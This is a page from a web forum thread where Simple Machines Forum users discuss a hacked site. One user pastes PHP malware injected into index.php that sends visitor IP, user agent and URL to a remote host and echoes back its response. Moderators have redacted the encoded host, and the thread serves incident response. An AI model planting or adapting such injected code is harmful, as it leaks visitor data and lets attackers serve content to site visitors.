Nasty, Hidden Virus on Simple Machines

Started by Flavious, October 06, 2011, 04:47:06 PM

Previous topic - Next topic
Print
Go Down Pages 1 2 3 4
User actions

OCJ

#60
May 03, 2012, 03:04:35 AM Last Edit: May 04, 2012, 06:35:26 AM by Yoshi2889
Update ... hacked again.


Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.

Code Select

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
       $stCurlLink = base64_decode( '{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           @$stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle);
}
}
?>

(edit: removed base64 string to render code (semi-)unusable)

nend

#61
May 03, 2012, 09:51:46 AM Last Edit: May 03, 2012, 03:24:43 PM by Yoshi2889
If you decode the base64 that is in the script you end up with this url.

Code Select
http://{snap}.com/stat/stat.php

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子

#62
May 03, 2012, 03:24:23 PM
You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

NanoSector

#63
May 04, 2012, 06:36:20 AM
I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Robert.

#64
May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

青山 素子

#65
May 04, 2012, 11:17:58 AM
Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

That only  works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.

OCJ

#66
May 29, 2012, 01:20:27 AM Last Edit: May 29, 2012, 03:27:44 AM by igirisjin
update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didnt work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.

I know some so called free firefox plugins from dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^
Print
Go Up Pages 1 2 3 4
User actions
Advertisement: